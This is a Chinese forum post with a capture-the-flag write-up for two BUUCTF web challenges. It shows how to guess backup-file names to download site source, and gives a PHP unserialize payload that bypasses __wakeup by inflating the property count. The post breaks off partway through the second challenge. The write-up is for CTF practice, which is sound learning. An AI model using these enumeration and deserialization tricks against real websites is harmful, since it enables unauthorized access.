BUUCTF-Web方向16-20wp

打印 上一主题 下一主题

主题 969|帖子 969|积分 2907

[极客大寻衅 2019]PHP

由内容提示应该存在源码备份,常见的如下,一个个尝试
  1. 后缀:tar tar.gz zip rar
  2. 名字:www web website backup back wwwroot temp
复制代码
访问www.zip,下载下来

解压查看

index.php

flag.php

class.php
  1. [/code]结果如下
  2. [code]<?php
  3. class Name{
  4.     private $username = 'admin';
  5.     private $password = 100;
  6. }
  7. $A=new Name();
  8. echo serialize($A);
  9. ?>
复制代码

  • 这里需要绕过__wakeup函数,而__wakeup函数存在一个特性,当成员属性数量大于实际数量时才可绕过wakeup
  • 由于序列化的存在空字符,故需要%00来代替,即空字符的url编码
  1. O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
复制代码
拿到flag

[ACTF2020 新生赛]BackupFile

题目提示备份文件
  1. 后缀:tar tar.gz zip rar
  2. 名字:www web website backup back wwwroot temp
复制代码
除了以上这些,还有.bak/.swp/.old,都可以试试
这里使用dirsearch扫出来index.php.bak文件,下载下来

使用记事本打开
[code]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

缠丝猫

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表